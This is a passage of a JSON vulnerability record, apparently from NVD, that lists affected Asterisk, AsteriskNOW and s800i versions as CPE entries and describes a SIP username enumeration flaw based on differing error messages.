              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.8:*:*:*:*:*:*:*",
              "matchCriteriaId": "7F80CBCB-F58D-4BE7-8E78-67E04C900D01",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.9:*:*:*:*:*:*:*",
              "matchCriteriaId": "EB61D32E-3400-480E-BD27-BA3F98F94427",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.10:*:*:*:*:*:*:*",
              "matchCriteriaId": "D9154EDB-CAE6-4BB0-8D02-9EC2B81D93C9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.10.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "A432B0A7-F158-4B9C-97F6-6A29DB13EAFA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.11:*:*:*:*:*:*:*",
              "matchCriteriaId": "687C67CB-46AF-40C2-8A02-081C7F78568A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.12:*:*:*:*:*:*:*",
              "matchCriteriaId": "6E8D6EC0-A61E-4DBC-A0C7-864E9C4BDA1A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.12.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "2EF7F65A-45FD-4586-901E-49B057100BB4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.13:*:*:*:*:*:*:*",
              "matchCriteriaId": "300F158E-ED27-46C8-85E4-AA0AA6B201DB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.14:*:*:*:*:*:*:*",
              "matchCriteriaId": "FB6F04C0-3226-4D2C-97A3-39999483C62C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.15:*:*:*:*:*:*:*",
              "matchCriteriaId": "30685A20-963A-48D4-B7D7-2C11C2C812AA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.16:*:*:*:*:*:*:*",
              "matchCriteriaId": "C54C3AAC-4D5D-4661-86AB-6849982E8C67",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.16.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "6F847916-89F1-4AA6-973D-6002C8B54EE8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.16.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "5359815E-671A-4DFD-9E99-8CF903A03C84",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.17:*:*:*:*:*:*:*",
              "matchCriteriaId": "E2EFBC9E-4DCA-43CB-93EB-6807E2383A98",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.18:*:*:*:*:*:*:*",
              "matchCriteriaId": "98755B1B-CAD5-4AC5-8571-52E67C3A8274",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.19:*:*:*:*:*:*:*",
              "matchCriteriaId": "C9D8C8FE-3D09-4F60-AD03-9D4439942141",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.19:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "902FBE4B-5237-43CD-8EB6-D2CAC0F30879",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.19:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "708DCACA-49EC-468D-81EC-CE5367F8A164",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.19:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "BA9E3314-7D23-414C-8187-16D807410B62",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.19:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "D824ED7B-BAB6-4C0F-A6B0-A75AB072EC0F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.19.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "7A01CE63-F834-48B2-826D-2DAD1B4AE8C3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.19.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "88B9CC9D-3DC2-4674-BA52-4C6D4E2056C4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.20:*:*:*:*:*:*:*",
              "matchCriteriaId": "43F1849F-1230-45E7-B6A3-D6FC72EB0F11",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.20:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "873C9C7E-93A3-4269-B19C-AB33A21C1AC7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.20:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "457F2112-7C5E-4953-8F4C-117925D486DA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.20:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "BD15ADD6-D7FA-441A-A9BC-487BCC15F2A0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.20.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "792A8901-B7B8-40E8-9258-6338B72770FD",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.21:*:*:*:*:*:*:*",
              "matchCriteriaId": "0E6C8F78-0C00-45A5-8FEB-2A4BD5AC1A37",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.21:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "F3E04247-C4EF-4C1B-B879-5C02986950D3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.21:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "5E382FC8-4001-4058-9151-05AE98B4A35E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.21.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "11FECE6B-B6A6-4DDA-9019-9A10B05EC1F8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.21.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "D9813D27-0688-4989-99EB-1DC0F82D59F6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.22:*:*:*:*:*:*:*",
              "matchCriteriaId": "D4333904-9D21-4149-965F-F49F0A34BD85",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.22:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "F7180626-F0FD-46F3-AD52-5C67525C4B46",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.22:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "85A1E3A3-C157-4F3D-9477-F63771E7F627",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.22:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "FEE739CC-7A9C-489E-BFC0-6257129C043D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.22:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "ADC0E947-A95A-44ED-8DED-CC769FF00569",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.22:rc5:*:*:*:*:*:*",
              "matchCriteriaId": "DE52BD9F-3728-455C-BC45-1A4DB926FFE9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.22.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "1EF82D41-9222-42D3-ADAD-94B4F950C63F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.22.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "2AE9F181-A8E4-4700-A30F-211CDE251606",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.23:*:*:*:*:*:*:*",
              "matchCriteriaId": "5B10AE4B-EC2D-4D5B-B842-50F5097A0650",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.23:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "83E854D0-17A2-473B-B7E8-41E6447C81DC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.23:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "47169133-3854-4D8F-B79E-3CC77A166EF0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.23:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "6071601F-CF37-4E66-9D6D-AFC3434C18AB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.23:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "2A575824-E005-4820-824A-4875594619E4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.23.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "080C7089-5662-4A94-9842-C4A26095DA4B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.23.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "7AE38697-0B16-4032-9234-CA263E4A9885",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.24:*:*:*:*:*:*:*",
              "matchCriteriaId": "DCB18BE2-B073-429C-ABE7-B8305793DAE4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.24:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "FA7216BA-A42F-4ED8-8086-B4FA483FDAB6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.24.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "CB7D2048-CD61-46C0-830B-11976B275783",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.25:*:*:*:*:*:*:*",
              "matchCriteriaId": "8DBA63FE-62AF-4F3D-B30C-550D17C4E35F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.25:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "AD0A0F19-020D-4578-9023-12B0CB646D9C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.25.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "96D5A1E3-FF0B-4C71-AA51-655D7106880D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.26:*:*:*:*:*:*:*",
              "matchCriteriaId": "E5D425E6-E2E5-4452-9EAA-2697C1155784",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.26:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "9855FA26-0930-4AC9-A920-B394F6916349",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.26:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "BBA21246-7DF4-41BC-998A-05D38FC97C8F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.26:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "EE9A7984-22C9-4296-8E44-C010E67F193D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.26:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "51B2C42A-C252-4BD8-A908-8F30C2BF15E7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.26:rc5:*:*:*:*:*:*",
              "matchCriteriaId": "2137CEAD-0F19-43C5-A26D-1972564FCD8C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.26:rc6:*:*:*:*:*:*",
              "matchCriteriaId": "B7552466-B782-4F16-8561-A2A51E94FED4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.26.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "C2F8C82D-3031-4C62-89FA-3BF56EA29727",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.26.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "B3074CEA-46BD-4CAD-BF5C-10008A80E434",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "B8374B5D-DE7A-4C3C-A5FE-579B17006A54",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0:beta1:*:*:*:*:*:*",
              "matchCriteriaId": "C7494CE2-D3CC-404D-BE61-09A2E1FB3E47",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0:beta2:*:*:*:*:*:*",
              "matchCriteriaId": "06E48482-D9AF-4038-80DA-27D9B4907C0B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0:beta3:*:*:*:*:*:*",
              "matchCriteriaId": "9BC3C441-290F-471A-BA19-6B1C4D72A670",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0:beta4:*:*:*:*:*:*",
              "matchCriteriaId": "632ED295-B67D-43CF-BF38-CCE04088BA08",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0:beta5:*:*:*:*:*:*",
              "matchCriteriaId": "50F3835F-6F2B-4EA7-B111-3B3C26548BC1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0:beta6:*:*:*:*:*:*",
              "matchCriteriaId": "0DCF7BD2-7903-4DC5-ADDC-EFCDC58736C5",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0:beta7:*:*:*:*:*:*",
              "matchCriteriaId": "E5BECFE0-286F-4DA1-8CA9-6CEE861C3012",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0:beta7.1:*:*:*:*:*:*",
              "matchCriteriaId": "AFFF3245-2D0F-46E3-A1D6-319086489DC2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0:beta8:*:*:*:*:*:*",
              "matchCriteriaId": "C91F2524-99D1-4C4B-9A31-21C0FB8B4D5F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0:beta9:*:*:*:*:*:*",
              "matchCriteriaId": "7B1BC0FF-9DB6-4FCC-A845-053943CF0D24",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "419D4D16-E790-4872-B9AF-1320978768C9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0:rc5:*:*:*:*:*:*",
              "matchCriteriaId": "73D30BA6-1EE0-4C3F-8F69-65C698A1B9A1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0:rc6:*:*:*:*:*:*",
              "matchCriteriaId": "D39FA25D-AB56-470D-94AB-14446DB7D475",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "4225252F-5960-4A42-A575-00C125860E89",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "A65D76A8-BBDD-4BDE-B789-D745C400DCBE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "A8B0F5A5-4252-4A9C-B830-2419E87AE5A0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0.3:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "F9085056-3BE9-4309-9601-9CA0569BC215",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0.4:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "D8432455-9064-479F-B060-BF2A74ECC3EB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0.5:*:*:*:*:*:*:*",
              "matchCriteriaId": "9E8EF2D7-371B-4268-989E-25225CC1F7B6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0.6:*:*:*:*:*:*:*",
              "matchCriteriaId": "ABAC4CE9-1CFA-4279-B0CE-18F3C6FB9AB3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0.7:*:*:*:*:*:*:*",
              "matchCriteriaId": "E16E37A0-F739-4EEE-A1BB-EBC558C62767",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0.8:*:*:*:*:*:*:*",
              "matchCriteriaId": "DF0E2562-D0FC-404C-B725-617AEEF20AB8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0.9:*:*:*:*:*:*:*",
              "matchCriteriaId": "C831EC2A-C99D-4FB1-8E5C-2FF685792F2B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0.10:*:*:*:*:*:*:*",
              "matchCriteriaId": "F37C4158-6C4E-448D-929B-288480748289",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0.11:*:*:*:*:*:*:*",
              "matchCriteriaId": "6BBA9D27-E3DC-45CE-B56B-2C6781AA6A16",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0.11:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "14CD1CCD-DFF2-4813-B56F-EA1C78AA818E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0.11:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "4499411B-C92E-47F3-A6F2-8C9011B1CBCC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0.14:*:*:*:*:*:*:*",
              "matchCriteriaId": "57325096-F4D8-4146-A6FD-93219F2C72D5",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0.14:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "9684FD88-7422-4272-B9BC-D8638B1AA0B9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0.15:*:*:*:*:*:*:*",
              "matchCriteriaId": "648639A2-26C4-4EDA-A982-25D400836696",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0.16:*:*:*:*:*:*:*",
              "matchCriteriaId": "4F9F6FF8-8B88-4A02-B23A-0CADA8CE316E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0.16:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "37DE011D-1C1B-46AC-9265-F82693CE3C9A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0.16:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "790BF14A-0193-4A5C-802B-D82200B22342",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "B8FE4BCF-9AE7-4F41-BA84-E9537CC1EBE3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "F25B0D15-7C09-4BBB-AC84-A1898F448DB7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "F259057F-3720-45D8-91B4-70A11B759794",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.0:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "A106C460-4CE2-4AC3-B2FD-310F05507511",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.0:rc5:*:*:*:*:*:*",
              "matchCriteriaId": "3E119FF9-2AD3-450D-8BBF-C6DD063246EA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "759221D5-FC37-446D-9628-233B8D0B9120",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "F82D4812-0429-42D4-BD27-C76CB9E7C368",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.3:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "F8FE11D6-8C0A-450E-B6DA-3AFE04D82232",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.4:*:*:*:*:*:*:*",
              "matchCriteriaId": "5D1FBCC8-4637-4A67-BFFD-C052C3C03C12",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.5:*:*:*:*:*:*:*",
              "matchCriteriaId": "F7307E10-9FA5-4940-B837-7936384F61DD",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.5:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "3D0DC9D6-D4D6-46CB-98DA-F4FC1835B6B7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.6:*:*:*:*:*:*:*",
              "matchCriteriaId": "DBBD0747-F3FF-46D8-A3C4-8268E37BC5AE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.7:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "3F759F27-008E-47FB-AC0A-EF11DA19918E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.7:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "D15C82BA-BD1F-4A19-A907-E6C30042F537",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.8:*:*:*:*:*:*:*",
              "matchCriteriaId": "2E802481-C8BD-4218-8CDC-5DB112DA946C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.10:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "0004AADE-1652-4242-A97D-E9818FE03CCF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.10:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "543E9C91-60FE-43AE-9B94-08DD730BA814",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisknow:1.5:*:*:*:*:*:*:*",
              "matchCriteriaId": "FF81215F-0DD3-48FC-BA1C-19E42FCD47B5",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:digium:s800i:1.3.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "565444DE-F67C-4B6E-AC1E-92FC0D8A87CC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:h:digium:s800i:1.3.0.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "80E356B2-4AEA-4532-A6F8-13B814BEB2C8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:h:digium:s800i:1.3.0.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "60F261AB-3172-4245-8090-744294A0D08A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:h:digium:s800i:1.3.0.4:*:*:*:*:*:*:*",
              "matchCriteriaId": "A3DD6B08-D77D-4275-8F91-2CA47FF6E363",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:a:-:business:*:*:*:*:*",
              "matchCriteriaId": "B1868709-03F9-47AA-A196-367D783C62BB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:b:-:business:*:*:*:*:*",
              "matchCriteriaId": "564A4529-997D-4615-BED8-AE3FB159689A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:b.1.3.2:-:business:*:*:*:*:*",
              "matchCriteriaId": "FE9D66C4-F49D-4EC4-B5A9-24F28726A9B0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:b.1.3.3:-:business:*:*:*:*:*",
              "matchCriteriaId": "BEFA5054-D5F9-4D07-9A66-D7AAD6953F5C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:b.2.2.0:-:business:*:*:*:*:*",
              "matchCriteriaId": "D110DCEB-F2F9-4600-B49F-22952C71B785",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:b.2.2.1:-:business:*:*:*:*:*",
              "matchCriteriaId": "3333A119-D92F-433C-BF5D-0037199256C4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:b.2.3.1:-:business:*:*:*:*:*",
              "matchCriteriaId": "19C44C33-EADA-48FD-A634-8066A003AFD0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:b.2.3.2:-:business:*:*:*:*:*",
              "matchCriteriaId": "294A2BA2-26EB-40AD-B861-7FA9043CD097",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:b.2.3.3:-:business:*:*:*:*:*",
              "matchCriteriaId": "4FAC61AF-BDF2-4397-A8F8-9D9155836E4C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:b.2.3.4:-:business:*:*:*:*:*",
              "matchCriteriaId": "33DE61C2-8C6A-4CD3-8D56-E70C4356CD50",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:b.2.3.5:-:business:*:*:*:*:*",
              "matchCriteriaId": "EECB5F75-BCE2-4777-933E-25EB5657750C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:b.2.3.6:-:business:*:*:*:*:*",
              "matchCriteriaId": "B5D51557-3E67-4C9A-9753-472D13FCA5C6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:b.2.5.0:-:business:*:*:*:*:*",
              "matchCriteriaId": "C063FCFA-B1C3-4ACB-B9E7-B3FC973FD898",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:b.2.5.1:-:business:*:*:*:*:*",
              "matchCriteriaId": "761DB3A3-1540-4976-AEB2-F8E45CCCC5E3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:b.2.5.2:-:business:*:*:*:*:*",
              "matchCriteriaId": "B53CD2C1-9BF0-42F9-B3E3-2C9915E531C0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:b.2.5.3:-:business:*:*:*:*:*",
              "matchCriteriaId": "947F58B8-21AF-460B-8203-D2605A1F91D6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:c:-:business:*:*:*:*:*",
              "matchCriteriaId": "7CD989BE-8FA0-4EDB-8442-C2E12BD01D27",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:c.2.3:-:business:*:*:*:*:*",
              "matchCriteriaId": "3FA908BA-BEF8-44A5-AC95-E7CF020D0C94",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:c.3.0:-:business:*:*:*:*:*",
              "matchCriteriaId": "78E8936C-033B-49E6-BB39-D5BBBC80EB55",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Asterisk Open Source 1.2.x before 1.2.35, 1.4.x before 1.4.26.3, 1.6.0.x before 1.6.0.17, and 1.6.1.x before 1.6.1.9; Business Edition A.x.x, B.x.x before B.2.5.12, C.2.x.x before C.2.4.5, and C.3.x.x before C.3.2.2; AsteriskNOW 1.5; and s800i 1.3.x before 1.3.0.5 generate different error messages depending on whether a SIP username is valid, which allows remote attackers to enumerate valid usernames via multiple crafted REGISTER messages with inconsistent usernames in the URI in the To header and the Digest in the Authorization header."
    },
    {
      "lang": "es",
